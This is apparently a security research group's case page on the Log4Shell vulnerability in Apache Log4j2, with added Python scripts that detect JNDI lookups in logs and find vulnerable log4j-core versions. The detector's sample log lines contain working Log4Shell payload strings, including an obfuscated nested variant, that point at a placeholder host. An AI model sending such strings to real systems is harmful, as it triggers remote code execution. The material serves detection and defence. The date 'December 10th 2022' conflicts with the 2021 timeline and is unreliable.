CASE: APACHE LOG4J2

Written on 05 Apr 2022 by Gerard Janssen, updated on 09 Dec 2024 by Serena de Pater

The case

On Thursday, December 9th 2021, Twitter user Lunasec (@P0rZ9) wrote a cryptic tweet:

‘Apache Log4j2 jndi RCE’

The tweet suggested that Lunasec could remotely execute code through version 2 of Log4j, Java's logging library. Log4j is an open-source Java library and one of the most popular Java logging frameworks. It is a project of the Apache Software Foundation (ASF), a non-profit organization. The same day the tweet appeared, a proof of concept of the exploit was published on GitHub.

The exploit

The exploit functions in the following way: a vulnerable Log4j server logs a payload that an attacker has crafted. Logging that payload can trigger the server, through JNDI (Java Naming and Directory Interface), to connect to a server controlled by the attacker and fetch an additional payload, which is then executed. The attack can be carried out in various ways, such as through HTTP requests, SMS messages, emails, or any user-controlled field; essentially, anything that ends up being logged. With the right message in the log, an attacker could achieve unauthenticated Remote Code Execution (RCE).
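As an added example (not part of the original DIVD case page), the following Python script shows the detection side of the mechanism described above: it scans web-server log lines for the Log4j lookup syntax that would trigger a JNDI request. Because Log4j evaluates nested lookups before the JNDI one, a detector that only matches the literal `${jndi:` string misses variants in which that string is assembled from inner lookups, so the script first collapses the nested forms. The log lines are constructed for this example and the host `example.invalid` is a placeholder.

```python
import re

# Constructed sample log lines (not real traffic): one benign request and two
# requests that carry a Log4j lookup string in fields a server would log
# (the User-Agent header and the query string).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [09/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [09/Dec/2021:10:00:02 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [09/Dec/2021:10:00:03 +0000] "GET /?q=${${lower:j}ndi:rmi://example.invalid/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
]

# Innermost ${lower:x} / ${upper:x} lookups, which Log4j resolves to the literal x.
_NESTED = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}")
# The ${name:-default} form, which resolves to the default when "name" is unknown.
_DEFAULT = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# The lookup that causes the JNDI request; the group captures the scheme (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def normalize_lookups(text):
    """Collapse nested lookups until nothing changes, so the detector sees the
    string Log4j itself would end up evaluating."""
    prev = None
    while prev != text:
        prev = text
        text = _NESTED.sub(lambda m: m.group(1), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
    return text


def find_jndi_lookups(line):
    """Return the lower-cased JNDI schemes referenced by one log line, after normalization."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalize_lookups(line))]


def scan_log(lines):
    """Return one finding per line that contains a JNDI lookup:
    the 1-based line number, the schemes used, and the normalized text."""
    findings = []
    for number, line in enumerate(lines, start=1):
        schemes = find_jndi_lookups(line)
        if schemes:
            findings.append({"line": number, "schemes": schemes, "normalized": normalize_lookups(line)})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG_LINES):
        print(f"line {finding['line']}: JNDI lookup via {', '.join(finding['schemes'])}")
```

A match means the lookup string reached a log, not that it was evaluated by a vulnerable Log4j; to confirm exploitation, correlate findings with outbound LDAP, RMI or DNS connections from the logging host around the same timestamp.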

The impact

The news caused shockwaves in the information security community. The severity of the vulnerability, combined with how easily it could be exploited, made the potential impact enormous. Log4j is ubiquitous and present in a whole range of software. In a lot of cases, the developers don’t even know they are using it. ‘It is like sugar: present in your meals, even when you didn’t know,’ said DIVD researcher Frank Breedijk. The vulnerability has been dubbed Log4Shell, and Apache assigned it CVE-2021-44228. It later turned out that the Alibaba Cloud security team had already discovered the vulnerability on November 24th and reported it to Apache.

What we did

Since December 10th 2022, multiple researchers from DIVD have been working around the clock to search for vulnerable servers. Most spent an average of 16 hours per day working on methodologies to scan the internet for this vulnerability and warning users of vulnerable software. DIVD notified more than 3,500 possibly vulnerable users worldwide by email, advising them to upgrade to patched version 2.16.0. DIVD cooperated with DTACT in building a scanner and also helped the Dutch NCSC with compiling a list of software vulnerable to Log4Shell. The case was officially closed on the 5th of April, 2022.

What you can do

If you run Apache with a version below 2.0, or Apache and/or Log4j2 below 2.15.0-rc1, upgrade to version 2.17.1 as soon as possible.
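Because Log4j is often bundled inside other software without the operators knowing (the point made under "The impact"), the first step of the advice above is finding out which Log4j versions are actually deployed. The following Python script is an added example, not DIVD's scanner or any DTACT tooling: it walks a directory, opens every JAR/WAR/EAR/ZIP it finds (including archives nested inside archives, where Log4j usually hides), reads the Maven `pom.properties` that log4j-core ships at `META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties`, and flags versions below the page's 2.15.0-rc1 threshold with the page's recommended upgrade to 2.17.1. The fixture it scans is constructed in a temporary directory and contains only that properties file, no Log4j code.

```python
import io
import os
import re
import tempfile
import zipfile

# Where Maven records the artifact version inside a log4j-core jar.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")

# Thresholds taken from the page's advice.
FIRST_FIXED = "2.15.0-rc1"
RECOMMENDED = "2.17.1"

_VERSION = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z0-9]+))?$")


def parse_version(text):
    """Turn '2.14.1', '2.0' or '2.15.0-rc1' into a comparable tuple.
    A pre-release tag (rc1) sorts before the final release of the same number."""
    m = _VERSION.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    major, minor, patch, tag = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if tag else 1, tag or "")


def needs_upgrade(version):
    """True when the version is below the first fixed release named on the page."""
    return parse_version(version) < parse_version(FIRST_FIXED)


def _versions_in_archive(data, name):
    """Yield (location, version) for every log4j-core pom.properties in an archive,
    descending into nested archives such as a WAR's WEB-INF/lib."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for entry in zf.namelist():
            if entry == POM_PROPERTIES:
                lines = zf.read(entry).decode("utf-8", "replace").splitlines()
                props = dict(line.split("=", 1) for line in lines if "=" in line and not line.startswith("#"))
                if "version" in props:
                    yield name, props["version"].strip()
            elif entry.lower().endswith(ARCHIVE_SUFFIXES):
                yield from _versions_in_archive(zf.read(entry), f"{name}!/{entry}")


def scan_directory(root):
    """Return [(location, version, needs_upgrade)] for every log4j-core found under root."""
    results = []
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            if filename.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, filename)
                with open(path, "rb") as fh:
                    data = fh.read()
                for location, version in _versions_in_archive(data, path):
                    results.append((location, version, needs_upgrade(version)))
    return results


def build_sample_tree(root):
    """Constructed fixture: a WAR embedding a log4j-core 2.14.1 jar, plus a
    standalone 2.17.1 jar. Only pom.properties is written, no bytecode."""
    def jar_bytes(version):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr(POM_PROPERTIES, f"#Generated by Maven\nversion={version}\n"
                                        "groupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        return buf.getvalue()

    os.makedirs(os.path.join(root, "webapps"), exist_ok=True)
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", jar_bytes("2.14.1"))
    with open(os.path.join(root, "webapps", "app.war"), "wb") as fh:
        fh.write(war.getvalue())
    with open(os.path.join(root, "log4j-core-2.17.1.jar"), "wb") as fh:
        fh.write(jar_bytes("2.17.1"))


def demo():
    """Scan the constructed fixture and return {version: needs_upgrade}."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return {version: flag for _, version, flag in scan_directory(root)}


if __name__ == "__main__":
    for version, flag in sorted(demo().items()):
        print(f"log4j-core {version}: {'upgrade to ' + RECOMMENDED if flag else 'at or above ' + FIRST_FIXED}")
```

Run it against an application server's install directory instead of the fixture by calling `scan_directory("/path/to/server")`; the `location` field uses `!/` to show the path inside a nested archive. Shaded ("fat") JARs that relocate Log4j classes without keeping the Maven metadata will not be found this way, so treat a clean result as "nothing found", not "nothing present".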

More information